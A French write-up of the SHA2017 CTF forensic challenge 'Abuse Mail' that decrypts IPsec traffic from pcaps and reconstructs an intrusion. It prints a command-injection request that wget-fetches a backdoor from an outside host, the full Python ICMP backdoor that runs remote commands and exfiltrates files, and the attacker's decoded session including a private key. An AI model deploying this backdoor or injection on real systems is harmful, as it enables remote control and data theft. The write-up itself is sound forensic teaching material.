/ forensic

SHA2017 CTF - Abuse Mail (Network 300)

Enoncé :

Our abuse desk received an mail that someone from our network has hacked their company. With their help we found some suspected traffic in our network logs, but we can't find what exactly has happened. Can you help us to catch the culprit?

Fichiers :

abuse01.pcap
abuse02.pcap
abuse03.pcap

Résolution:

On commence par ouvrir les trois captures pour voir leur contenu. abuse01 contient du traffic TELNET et IPSEC. abuse02 et abuse03 contiennent du traffic ICMP.

Laissons abuse02 et abuse03 de côté pour l'instant.
Si on suit le flux TCP TELNET on peut observer une configuration IPSEC :

root@vpn1:~# .[Aip xfrm state
.
src 10.11.0.1 dst 10.11.0.83
	proto esp spi 0xce9b2ab8 reqid 1 mode tunnel
	replay-window 32 flag af-unspec
	auth-trunc hmac(sha1) 0x17f298179ebf35a4fa12d5d2c3f3b0466f435282 96
	enc cbc(aes) 0xfb59dc471ca7f58beb30cd0d1bcbb83d6bc0fe76bca7e92bf5c0e455b23e4fe4
	encap type espinudp sport 4500 dport 4500 addr 0.0.0.0
	anti-replay context: seq 0x0, oseq 0xd, bitmap 0x00000000
src 10.11.0.83 dst 10.11.0.1
	proto esp spi 0xcaa4cf43 reqid 1 mode tunnel
	replay-window 32 flag af-unspec
	auth-trunc hmac(sha1) 0xab7271cc8e3d0c403ed75323f8f8f582c784e821 96
	enc cbc(aes) 0x28fcaa9d777f940fac57e1be15477f5f074547b6a723df9243b0eb06bdd74619
	encap type espinudp sport 4500 dport 4500 addr 0.0.0.0
	anti-replay context: seq 0xd, oseq 0x0, bitmap 0x00001fff

Essayons de déchiffrer le traffic IPSEC avec ces paramètres.

Parfait ça fonctionne ! On obtient du traffic HTTP.

Si on suit le flux HTTP on se rend compte qu'un script suspect est téléchargé puis exécuté :

GET /?ip=%3Bwget%20http://10.5.5.207/backdoor.py%20-O%20/tmp/backdoor.py HTTP/1.1
Host: 10.29.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

GET /?ip=%3Bcat%20/tmp/backdoor.py HTTP/1.1
Host: 10.29.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

GET /?ip=%3Bnohup%20sudo%20python%20/tmp/backdoor.py%20K8djhaIU8H2d1jNb%20\& HTTP/1.1
Host: 10.29.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

On récupère le script (Export HTTP Objects) :

#!/usr/bin/env python

import base64
import sys
import time
import subprocess
import threading

from Crypto import Random
from Crypto.Cipher import AES
from scapy.all import *

BS = 16
pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS)
unpad = lambda s : s[0:-ord(s[-1])]
magic = "SHA2017"


class AESCipher:

    def __init__( self, key ):
        self.key = key

    def encrypt( self, raw ):
        raw = pad(raw)
        iv = Random.new().read( AES.block_size )
        cipher = AES.new( self.key, AES.MODE_CBC, iv )
        return base64.b64encode( iv + cipher.encrypt( raw ) )

    def decrypt( self, enc ):
        enc = base64.b64decode(enc)
        iv = enc[:16]
        cipher = AES.new(self.key, AES.MODE_CBC, iv )
        return unpad(cipher.decrypt( enc[16:] ))

def run_command(cmd):
    ps = subprocess.Popen(cmd,shell=True,stdout=subprocess.PIPE,stderr=subprocess.STDOUT)
    output = ps.communicate()[0]
    return output

def send_ping(host, magic, data):
    data = cipher.encrypt(data)
    load = "{}:{}".format(magic, data)
    time.sleep(1)
    sr(IP(dst=host)/ICMP()/load, timeout=1, verbose=0)

def chunks(L, n):
    for i in xrange(0, len(L), n):
        yield L[i:i+n]

def get_file(host, magic, fn):
    time.sleep(1)
    data = base64.urlsafe_b64encode(open(fn, "rb").read())
    cnt = 0
    icmp_threads = []
    for line in chunks(data, 500):
        t = threading.Thread(target = send_ping, args = (host,magic, "getfile:{}:{}".format(cnt,line)))
        t.daemon = True
        t.start()
        icmp_threads.append(t)
        cnt += 1

    for t in icmp_threads:
        t.join()


cipher = AESCipher(sys.argv[1])

while True:
    try: 
        pkts = sniff(filter="icmp", timeout =5,count=1)

        for packet in pkts:
             if  str(packet.getlayer(ICMP).type) == "8": 
                input = packet[IP].load
                if input[0:len(magic)] == magic:
                    input = input.split(":")
                    data = cipher.decrypt(input[1]).split(":")
                    ip = packet[IP].src
                    if data[0] == "command":
                        output = run_command(data[1])
                        send_ping(ip, magic, "command:{}".format(output))
                    if data[0] == "getfile":
                        #print "[+] Sending file {}".format(data[1])
                        get_file(ip, magic, data[1])
    except:
        pass

On peut remarquer que ce script transmet des commandes et des fichiers chiffrés dans le load ICMP. Intéressons nous donc aux fichiers abuse02 et abuse03.
On modifie le script comme ceci:

#pkts = sniff(filter="icmp", timeout =5,count=1)
pkts = rdpcap('abuse02.pcap')

data = cipher.decrypt(input[1]).split(":")
print data

On exécute ensuite le script avec la commande trouvé dans le traffic HTTP d'abuse01 :

python backdoor.py K8djhaIU8H2d1jNb

On obtient les sorties suivantes :

['command', 'ls -la']
['command', 'total 16\ndrwxr-xr-x 3 root     root     4096 Jul 26 09', '36 .\ndrwxr-xr-x 3 root     root     4096 Jul 26 03', '45 ..\ndrwxr-x--- 2 www-data www-data 4096 Jul 26 09', '37 css\n-rwxr-xr-x 1 www-data www-data 1664 Jul 26 04', '46 index.php\n']
['command', 'id']
['command', 'uid=0(root) gid=0(root) groups=0(root)\n']
['command', 'id']
['command', 'uid=0(root) gid=0(root) groups=0(root)\n']
['command', 'id']
['command', 'uid=0(root) gid=0(root) groups=0(root)\n']
['command', 'ls -la /root']
['command', 'total 32\ndrwx------  5 root root 4096 Jul 27 07', '27 .\ndrwxr-xr-x 22 root root 4096 Apr 18 05', '43 ..\n-rw-------  1 root root 3228 Jul 26 06', '44 .bash_history\n-rw-r--r--  1 root root 3106 Oct 22  2015 .bashrc\ndrwxr-xr-x  2 root root 4096 Jul 27 09', '11 certs\ndrwxr-xr-x  2 root root 4096 Jul 26 03', '47 .nano\n-rw-r--r--  1 root root  148 Aug 17  2015 .profile\ndrwx------  2 root root 4096 Jul 27 07', '27 .ssh\n']
['command', 'ls -la /root/certs']
['command', 'total 16\ndrwxr-xr-x 2 root root 4096 Jul 27 09', '11 .\ndrwx------ 5 root root 4096 Jul 27 07', '27 ..\n-rw-r--r-- 1 root root  989 Jul 27 07', '23 intranet.crt\n-rw-r--r-- 1 root root  916 Jul 27 07', '23 intranet.key\n']
['command', 'cat /root/certs/intranet.crt']
['command', '-----BEGIN CERTIFICATE-----\nMIICrDCCAhWgAwIBAgIJALfe3aETCSTsMA0GCSqGSIb3DQEBCwUAMG8xCzAJBgNV\nBAYTAk5MMRIwEAYDVQQIDAlGbGV2b2xhbmQxETAPBgNVBAcMCFplZXdvbGRlMRQw\nEgYDVQQKDAtTSEEyMDE3IENURjEjMCEGCSqGSIb3DQEJARYUc2hhMjAxN2N0ZkBn\nbWFpbC5jb20wHhcNMTcwNzI3MTQyMzIwWhcNMTgwNzI3MTQyMzIwWjBvMQswCQYD\nVQQGEwJOTDESMBAGA1UECAwJRmxldm9sYW5kMREwDwYDVQQHDAhaZWV3b2xkZTEU\nMBIGA1UECgwLU0hBMjAxNyBDVEYxIzAhBgkqhkiG9w0BCQEWFHNoYTIwMTdjdGZA\nZ21haWwuY29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC+H/mwETvdjGRn\nn/33zsjMOyPsg5xgSCsLDTg9D8XaeGp7ZQ1habE+9G0gabrKYntVburjitcuheXK\nhCo6nYWF2pSch4WjhNhCxkM++UeKRUv8xYAtSGl+6vvSrwogR+BfRuxZFAeJzvgK\nhNwL7sdW2CJ7Gk89pET/W6AOBNcDWwIDAQABo1AwTjAdBgNVHQ4EFgQUFeykHO7M\nV70l0IO87/3ogRb5VxMwHwYDVR0jBBgwFoAUFeykHO7MV70l0IO87/3ogRb5VxMw\nDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQsFAAOBgQCITumB4q5A+Lu9EzUe1qAW\nrjAeVfXq/qVrw+byH4VqNuEOBQ7lq151VbsXI1YQXCxVbP/r5Zxb1BfS/3qHHFDu\nSRqYaxh9c+BRkdAdzkFebMbIocnaLuVFpn237Z/ysSt0PPrTaI3gUSoz/7gXB+nX\nDkYKgl7BR0a72yTuLAc0GA==\n-----END CERTIFICATE-----\n']
['command', 'cat /root/certs/intranet.key']
['command', '-----BEGIN PRIVATE KEY-----\nMIICdwIBADANBgkqhkiG9w0BAQEFAASCAmEwggJdAgEAAoGBAL4f+bARO92MZGef\n/ffOyMw7I+yDnGBIKwsNOD0Pxdp4antlDWFpsT70bSBpuspie1Vu6uOK1y6F5cqE\nKjqdhYXalJyHhaOE2ELGQz75R4pFS/zFgC1IaX7q+9KvCiBH4F9G7FkUB4nO+AqE\n3Avux1bYInsaTz2kRP9boA4E1wNbAgMBAAECgYEAiYU/aedNUhc2mO3VGeXswC0W\n8wDPn6UT3U6WmzRJfJkVDGQvpYJ5vnu2Y3eWsMVDSKyOIkBPHUukxzOKCBPge449\nkMwW8cX0nHSGFl1HsYiY14Lr/BiOXz/c+I9Yg+Bexf5kCTYAjzqZ1ZErrIQvagNE\npXb1GGZrnrU7wH9FI8ECQQDhwEnscmqsnPr43E0eFUy3OybfQfo+mSRdq84zwHoW\nBofTUUOpDZpZhIWt6JsdsSqqYVt+W8XHqILraK/EQDnpAkEA15mi7tjozljGcjVP\ndYzB4m24vRK4guujNSJDXKwoDvjDI8x3iu/iTtfxkM3Swko4bxWwiUB7MOaCLgQO\nHaaEowJAXIzswZcWzLV+3s/SfebVkLkbcqQl58v48L4ix2y9oJIE1UmXp5MAGHsQ\nIwAdt8qOZ1OKov8U0onvQnuks5xxIQJBAMwBz5/MVfYzIIwfD7H+X9Pe2Ojn1vni\n+IslgbImIL2R/CxapF8uf+j1AtpvN9eqnV3XmzU0c50g8NuT8LtzvpsCQGUArCoa\nps7xk/SxGfz3IBrsUIOn3Iqh9wqoLfu7wVuc+LFIwkrNm6D5ZnzUapvO2oqj+5ER\niuSWkHY6ll1V1m0=\n-----END PRIVATE KEY-----\n']
['command', 'cat /root/certs/intranet.key']
['command', '-----BEGIN PRIVATE KEY-----\nMIICdwIBADANBgkqhkiG9w0BAQEFAASCAmEwggJdAgEAAoGBAL4f+bARO92MZGef\n/ffOyMw7I+yDnGBIKwsNOD0Pxdp4antlDWFpsT70bSBpuspie1Vu6uOK1y6F5cqE\nKjqdhYXalJyHhaOE2ELGQz75R4pFS/zFgC1IaX7q+9KvCiBH4F9G7FkUB4nO+AqE\n3Avux1bYInsaTz2kRP9boA4E1wNbAgMBAAECgYEAiYU/aedNUhc2mO3VGeXswC0W\n8wDPn6UT3U6WmzRJfJkVDGQvpYJ5vnu2Y3eWsMVDSKyOIkBPHUukxzOKCBPge449\nkMwW8cX0nHSGFl1HsYiY14Lr/BiOXz/c+I9Yg+Bexf5kCTYAjzqZ1ZErrIQvagNE\npXb1GGZrnrU7wH9FI8ECQQDhwEnscmqsnPr43E0eFUy3OybfQfo+mSRdq84zwHoW\nBofTUUOpDZpZhIWt6JsdsSqqYVt+W8XHqILraK/EQDnpAkEA15mi7tjozljGcjVP\ndYzB4m24vRK4guujNSJDXKwoDvjDI8x3iu/iTtfxkM3Swko4bxWwiUB7MOaCLgQO\nHaaEowJAXIzswZcWzLV+3s/SfebVkLkbcqQl58v48L4ix2y9oJIE1UmXp5MAGHsQ\nIwAdt8qOZ1OKov8U0onvQnuks5xxIQJBAMwBz5/MVfYzIIwfD7H+X9Pe2Ojn1vni\n+IslgbImIL2R/CxapF8uf+j1AtpvN9eqnV3XmzU0c50g8NuT8LtzvpsCQGUArCoa\nps7xk/SxGfz3IBrsUIOn3Iqh9wqoLfu7wVuc+LFIwkrNm6D5ZnzUapvO2oqj+5ER\niuSWkHY6ll1V1m0=\n-----END PRIVATE KEY-----\n']
['command', 'cat /etc/hosts']
['command', '127.0.0.1\tlocalhost\n127.0.1.1\tubuntu\n\n# The following lines are desirable for IPv6 capable hosts\n', '', '1     localhost ip6-localhost ip6-loopback\nff02', '', '1 ip6-allnodes\nff02', '', '2 ip6-allrouters\n10.29.0.1\trouter\n192.168.1.1     router\n192.168.1.2     intranet\n']
['command', 'nohup nmap intranet > /tmp/intranet.nmap']
['command', '']
['command', 'cat /tmp/intranet.nmap']
['command', '\nStarting Nmap 7.01 ( https', '//nmap.org ) at 2017-07-27 09', '48 PDT\nNmap scan report for intranet (192.168.1.2)\nHost is up (0.00010s latency).\nNot shown', ' 997 closed ports\nPORT    STATE SERVICE\n22/tcp  open  ssh\n80/tcp  open  http\n443/tcp open  https\nMAC Address', ' 00', '0C', '29', '3D', 'FD', 'B0 (VMware)\n\nNmap done', ' 1 IP address (1 host up) scanned in 1.52 seconds\n']
['command', 'cat /tmp/intranet.nmap']
['command', '\nStarting Nmap 7.01 ( https', '//nmap.org ) at 2017-07-27 09', '48 PDT\nNmap scan report for intranet (192.168.1.2)\nHost is up (0.00010s latency).\nNot shown', ' 997 closed ports\nPORT    STATE SERVICE\n22/tcp  open  ssh\n80/tcp  open  http\n443/tcp open  https\nMAC Address', ' 00', '0C', '29', '3D', 'FD', 'B0 (VMware)\n\nNmap done', ' 1 IP address (1 host up) scanned in 1.52 seconds\n']
['command', 'cat /tmp/intranet.nmap']
['command', '\nStarting Nmap 7.01 ( https', '//nmap.org ) at 2017-07-27 09', '48 PDT\nNmap scan report for intranet (192.168.1.2)\nHost is up (0.00010s latency).\nNot shown', ' 997 closed ports\nPORT    STATE SERVICE\n22/tcp  open  ssh\n80/tcp  open  http\n443/tcp open  https\nMAC Address', ' 00', '0C', '29', '3D', 'FD', 'B0 (VMware)\n\nNmap done', ' 1 IP address (1 host up) scanned in 1.52 seconds\n']
['command', 'cat /tmp/intranet.nmap']
['command', '\nStarting Nmap 7.01 ( https', '//nmap.org ) at 2017-07-27 09', '48 PDT\nNmap scan report for intranet (192.168.1.2)\nHost is up (0.00010s latency).\nNot shown', ' 997 closed ports\nPORT    STATE SERVICE\n22/tcp  open  ssh\n80/tcp  open  http\n443/tcp open  https\nMAC Address', ' 00', '0C', '29', '3D', 'FD', 'B0 (VMware)\n\nNmap done', ' 1 IP address (1 host up) scanned in 1.52 seconds\n']
['command', 'curl -k https', '//intranet/']
['command', '  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\n                                 Dload  Upload   Total   Spent    Left  Speed\n\r  0     0    0     0    0     0      0      0 --', '--', '-- --', '--', '-- --', '--', '--     0\r100   456  100   456    0     0   4871      0 --', '--', '-- --', '--', '-- --', '--', '--  4903\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>401 Unauthorized</title>\n</head><body>\n<h1>Unauthorized</h1>\n<p>This server could not verify that you\nare authorized to access the document\nrequested.  Either you supplied the wrong\ncredentials (e.g., bad password), or your\nbrowser doesn\'t understand how to supply\nthe credentials required.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at intranet Port 443</address>\n</body></html>\n']
['command', 'tcpdump -D']
['command', '1.ens33 [Up, Running]\n2.ens39 [Up, Running]\n3.any (Pseudo-device that captures on all interfaces) [Up, Running]\n4.lo [Up, Running, Loopback]\n5.nflog (Linux netfilter log (NFLOG) interface)\n6.nfqueue (Linux netfilter queue (NFQUEUE) interface)\n7.usbmon1 (USB bus number 1)\n8.usbmon2 (USB bus number 2)\n']
['command', 'tcpdump -i usbmon2 -w /tmp/usb.pcap']
['command', 'tcpdump host intranet -w /tmp/intranet.pcap']

On met la clé privée de côté, ça pourra surement nous servir plus tard.
On remarque également les deux tcpdump à la fin.

['getfile', '/tmp/intranet.pcap']
['getfile', '22', 'xMWknTPeWuv2HY5z-Tp3Th8wX049inFKvUYvyQhSnuWRsJ8XzXXMYRfYezTcfq9rVFulD0i2Etj8CN3CMylyEVucEymaXhAHKJeR134iXZXUGgFFEzT8tBp8TTPF9cH0webjPbT3NYAxdcM1Wosa6PQD4Cun6osJb5WXuXQ0hZQLKOEx3s_cDoIR2hQmLNbb7lslfPvGEB79Ti_j-CahSlhI8Dbw5ON4yMeCqMMsuPc45ZAAZ8AXWi_CKGLgOvRGJHjMt7ML7MuskilBFw3g0n6vg2nugnqLNLftwWZh8CTvwiRNjNgEATCsNg1RNELnu3n_CXb_Djwlzbsei9zXQPQKPnmdHwucaHNRX51Z5gGEaIxXcjqRyNAGYHVqsTy4BbM32F_-dd1LSKOorBBGoXQLWfKGYHeb1m271eBchjv-JWWFpzK-yHztsmZn2At3i4T_vbuW72zUj3BvoerDO-srr6RKI-4UGrwzbEpjW5PNXq2FmYeKHt5hXT4EhBTgQOXxCvjtS_LIGkPWX1S36x2xBj87JdsRpo6UqrYWrDkDVycbksITiqo7EjNu-bvmHGbxO20cSUxMqHSgbA6PmkYdKPtR_AyjZreMEIMnnw_CmD0svSTpN4NrmLe-g4qUwYj4BENz_dSmLyvN7IYnoCcVwEACDyDBjv-Yg2PY6NUBARI68jWLdmHePchpYWXS3ZKdrt1eycVErN6YhJquGOVpfY9S4_1GenYWRY8in2MeK1105Y2eBKmxWIvZ8f8iW8EGsqAIeAZ0MmJUphs4Ibp-54z1dyRU']
['getfile', '3', '8XB7Q94TDBClV8w4qhq69z3FZYrv8t2WgEKqgXrWdlHdlAFX8ALVsMhCJIBkRaym0tYdVp1SG4MaZR4Tss3uWqkUHUP2IHv2mxW9kJtXQcCFacZu6BB6WbVWAABCAAAAQgAAAAAMKUT6VQAMKT39sAgARQAANPb5QABABsB2wKgBAsCoAQEBu8YiHIz10SeSnX2AEADzDMEAAAEBCAoAJQRCAWpAmegQelnOVgAAjQAAAI0AAAAADCk9_bAADClE-lUIAEUAAH_bZ0AAQAbbvcCoAQHAqAECxiIBuyeSnX0cjPXRgBgA8YPFAAABAQgKAWpAowAlBEIUAwMAAQEWAwMAQGxEpdaDTXP8knA4zCtiwo73wxpiSMwEg4mUp0JHTM5EVi8fDHmJwxa4h0XRCtUMYW1ku3J8B2mDM4-Be7yzVgXoEHpZwVcAAEIAAABCAAAAAAwpRPpVAAwpPf2wCABFAAA09vpAAEAGwHXAqAECwKgBAQG7xiIcjPXRJ5KdyIAQAPMMbAAAAQEICgAlBEIBakCj6BB6WWhYAABcAQAAXAEAAAAMKUT6VQAMKT39sAgARQABTvb7QABABr9awKgBAsCoAQEBu8YiHIz10SeSnciAGADzZFwAAAEBCAoAJQRCAWpAoxYDAwDKBAAAxgAAASwAwAgdhAXn_d9KSZnZsG-gE9lS8acf1BQiUuNF04t4gevS8ICJtSUIJdGsE-qc2tSvQnLimi0T1iSzd47KHZC4nPZt8UmAPz8CvuPkoG2nSNnhtH7aG3vuLtigzX4okzcPOGpR']
['getfile', '15', 'TcpH8DKbQqyDTZP90vOPC7ZroVI7FBLP3tehUVdCsB5kcVOtOgwoeNuBDLMQwHANdbwLTIcc8rWzDtchd96wrcnYimMMVXom7hJFk9CYIvLi1AjgVnUmgijI_ZAvr768ZkMUK9zVD1CWi7x1yw-7a3r9XPaQAx4C_VXxF42RQ7lofpm0NeTW_RQddZVBmc7JRGHSyhhgvnPK9AvSftJCCR2w4U7ivYo3uXfyVBjkj2OnMPWtUeqWQxEMSVPnTp8pQ7CHG0ZhHzowGnNued80Q9s3cR5Dkb2EeAVtwoWObjMziRAuwahOsO88dbD0mOFbJMPNCQst5qOv0KkgXc4ArGuRdj3DqLdqZboIsRIFwk1BKxHoaBedqa8F8GR2t1RZ-xR31I5RSnJrJSn-v2ktPLitzNW5K46Ors604DI6pwH3GKv1moTI-Bc_S54n1WATXNYWBcE5T8_BxHPB6ezfXuuJK-Epgfu5UDMwkRCS84b0R5GT4gYdWLqOvIF0bJrLI1OgDT-ODRNIt_Ehq3jnXlV0gIwLr0nWLzGjDh4dhGdvNC1kylYtkzta6L-eBcnkDjKhyWMZa2pL6NN5iF2RaoKswfm_ZmBEygpY0s8VlBFf0Ut7s6D1vyUNiNEGwR8LZ13L4rxE4Cz51rFPeKFO80yWeYtXEyCz7idxVoT9cp_U8ospLrMcmalnXvZL4OGPzwT7G_dpZoZ6tMYRBKwgSn1KuyvmGlY9VGyQk16PqgpAk09-tmwlYJeEhPQGlrx-JpW6agdmeibUwsMZ0-oYJBhD0cvVwyOt']
['getfile', '13', 'GA1QBh84hcfGb0cIr9PNPIVMe6FUmD-x98FH5mTW_8LsuTXYhYixTcRrJXFHr1D7NuQynU669tClrXvJsQO-14bI-5v0gG8rlpuDR2L2TdfeyFhxcoPgLKuFBTAGTZkt-6I4hBZaOY3hdFmITNTH-ch29k2E8SY5M9F-KU17oyQ8Kv2J9qbceSWRyCO0dVhJq2oOVvoJzhe2bWwQSHhlPEXy20onc7fz7E58Jw-rftZqGAuQWpcnobRrFlDPLXE2UI3pU2TXi0Wzg8teEOLpb7TDA87tA6EgOqV0tSCL0C8qEI8Fv6nEBiSI1zXGfzzmY3lO6P3kNZnOV6VXTF521So8XreKqd2vNYrgNpr-IljhTLZ0HMmHn6nHlvPWfJC-MswWe41ztWWQ0-LuhvMO8MR4Yl9bpEKwJ5pF0igdOPc0hY5Finn8rTSgAGuhJYFDniX79dhdam6Mi17TAVzw1Rhnp9qGHpXpRArXk_hg5dGNSfmJe4AktaOFqHeOmpa15QLc5wZm7RTvsXYN7-EhAHWDPg7ighLZipwy54nIQcztZM4mXzRAqoIWSJb-G5IxgVRZxhAs_4db4cG4c_pNHNxNh7m3romVsiPm9zmkU2Em0Qf_suCCDsGZSN1xFUJKBtn-W0bzyGqF2dNvWuG2UKT2mTbZ3jnEEcyRp-vyfsXDaKaSNxH1dvEo8_H7L3nOsi_jkB6YwKr0_dgcSclcOx_vYkvqRq9qrL5UMsE_s2ZnjTXC46CFLJecVfRBElmjOevT4MnC4GadhYJhwaEWUEuBh8Yvh4B1']
['getfile', '165', 'cHurdwdnjePy6Xa5SBJU_Mbe1VPdwEuXvCW1XXCaId6Y09yNKbwX0W3KPWiTJ_ZgDoSKci1FZs9sK9gFobVoTOMBicG6atQrQ5TuoL-Er2T8HDGkhComD0AfHzgxHQRy5LbcUsRpMvLLJfsv0ULnwmfjcmk6RWT1IChIG7gUxie3xVnh9lFiOZlVFxFz_NB1JPlWpTqV-8c_tFM9tSk4ud7u4lMdjPgKPO-5eknyZiT8g5WbwDqteDdSuRAfYTl0A0EoEBqNr3wiRTxJJlhGVCWX70ki5CDNCNKMlK9YifFey6W2DMv4_5m616CWgLUNJTeowqqHWA2INCeLrn-dHZi-ADsKHNYoxEqIrJlpZCiUM5L-rOC_TtQ6COT7Aro7kaH1qdQkwgygg2qP6_Xe5mFO4IOMFkcx-51kDyjtfHUGBx2veXXEDfAScnKY9GY_905jJafZ9J8vRfeszHiD0quOv0edGw8NbKp3_pk2nL2Ey-vCIcm4lR0WXOFuOmwj67o6mk_cq2n7axOkJ8gcEc61AqJ7LzZbJFr0_b3bnaZzkXuKF_IokNRQJDpD1WfLkI_ba8Q3u2d8nui9ljBWs7VzwAl8dR1iH4QtIIturGVQEIR8jA3mn1evUTQvFjA-BN2nlOmXqyjoXU0HcaOC53Vj2d1r_J_64CmdAnlWJ-2aeG3dCoP0fYYxvKKpI1g6WXCX_Li701DtBTl6Hnp6ICHW7GEqxK96H0BfB_Sb6UQFa_9ScfbNd3ohC9xxYiiGSssqHiHkiAJ0vfYXSZYMs9YeTpSA273k']
['getfile', '0', '1MOyoQIABAAAAAAAAAAAAAAABAABAAAA5xB6WZAsDgBKAAAASgAAAAAMKT39sAAMKUT6VQgARQAAPNtiQABABtwFwKgBAcCoAQLGIgG7J5Kb6QAAAACgAnIQg4IAAAIEBbQEAggKAWpAiwAAAAABAwMH5xB6WaYtDgBKAAAASgAAAAAMKUT6VQAMKT39sAgARQAAPAAAQABABrdowKgBAsCoAQEBu8YiHIzyvyeSm-qgEnEgcpEAAAIEBbQEAggKACUEKgFqQIsBAwMH5xB6WfMtDgBCAAAAQgAAAAAMKT39sAAMKUT6VQgARQAANNtjQABABtwMwKgBAcCoAQLGIgG7J5Kb6hyM8sCAEADlg3oAAAEBCAoBakCLACUEKucQelnd9w4ASgEAAEoBAAAADCk9_bAADClE-lUIAEUAATzbZEAAQAbbA8CoAQHAqAECxiIBuyeSm-ocjPLAgBgA5YSCAAABAQgKAWpAmAAlBCoWAwEBAwEAAP8DA1l6EL0as7WFBCDr9MCEzneqElXmDS5O2hIGJxciRonYAABswCvALMCGwIfACcAjwArAJMBywHPArMCtwAjAL8AwwIrAi8ATwCfAFMAowHbAd8ASAJwAncB6wHsALwA8ADUAPQBBALoAhADAwJzAnQAKAJ4An8B8wH0AMwBnADkAawBFAL4AiADEwJ7AnwAWAQAAagAXAAAAFgAAAAUABQEAAAAAAAAADQALAAAIaW50cmFuZXT_AQABAAAjAAAACgAMAAoAFwAYABkAFQATAAsAAgEAAA0AFgAUBAEE']
...
['getfile', '/tmp/usb.pcap']
['getfile', '0', '1MOyoQIABAAAAAAAAAAAAAAABADcAAAAUAd6WeKlBABAAAAAQAAAAIBo_BABiP__UwKABQQAADxQB3pZAAAAAOKlBACN____KAAAAAAAAACABgABAAAoAAAAAAAAAAAAAAIAAAAAAABQB3pZerAEAFIAAABSAAAAgGj8EAGI__9DAoAFBAAtAFAHelkAAAAAerAEAAAAAAASAAAAEgAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAAAABIBEAEAAAAI2QQCFhADAQIAAVAHelmtsAQAQAAAAEAAAACAaPwQAYj__1MCgAIEAAA8UAd6WQAAAACtsAQAjf___wQAAAAAAAAAowAAAAUABAAAAAAAAAAAAAACAAAAAAAAUAd6WWmxBABEAAAARAAAAIBo_BABiP__QwKAAgQALQBQB3pZAAAAAGmxBAAAAAAABAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAHAQAAUAd6WXCxBABAAAAAQAAAAIBo_BABiP__UwIAAgQAAABQB3pZAAAAAHCxBACN____AAAAAAAAAAAjAQIABQAAAAAAAAAAAAAAAAAAAAAAAABQB3pZ5rEEAEAAAABAAAAAgGj8EAGI__9DAgACBAAtPlAHelkAAAAA5rEEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAHelmDUgUAQAAAAEAAAACAaPwQAYj__1MCgAIEAAA8UAd6WQAAAACDUgUAjf___wQAAAAAAAAAowAAAAUABAAAAAAAAAAAAAAC']
['getfile', '32', 'AAAAAAAAAAAAAHIHellh4AsAQAAAAEAAAADAKg8pAIj__1MBgQUEAC08cgd6WQAAAABh4AsAjf___wgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAQCAAAAAAAAcgd6WWJwDgBIAAAASAAAAMAqDykAiP__QwGBBQQALQByB3pZAAAAAGJwDgAAAAAACAAAAAgAAAAAAAAAAAAAAAgAAAAAAAAABAIAAAAAAAAAAAgAAAAAAHIHelmncA4AQAAAAEAAAADAKg8pAIj__1MBgQUEAC08cgd6WQAAAACncA4Ajf___wgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAQCAAAAAAAAcwd6WQoJAABIAAAASAAAAMAqDykAiP__QwGBBQQALQBzB3pZAAAAAAoJAAAAAAAACAAAAAgAAAAAAAAAAAAAAAgAAAAAAAAABAIAAAAAAAAAAAAAAAAAAHMHellECQAAQAAAAEAAAADAKg8pAIj__1MBgQUEAC08cwd6WQAAAABECQAAjf___wgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAQCAAAAAAAAcwd6WS-ZAgBIAAAASAAAAMAqDykAiP__QwGBBQQALQBzB3pZAAAAAC-ZAgAAAAAACAAAAAgAAAAAAAAAAAAAAAgAAAAAAAAABAIAAAAAAAAAAA8AAAAAAHMHellumQIAQAAAAEAAAADAKg8pAIj__1MBgQUEAC08cwd6WQAAAABumQIAjf___wgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAQCAAAAAAAAcwd6WXhO']
['getfile', '4', 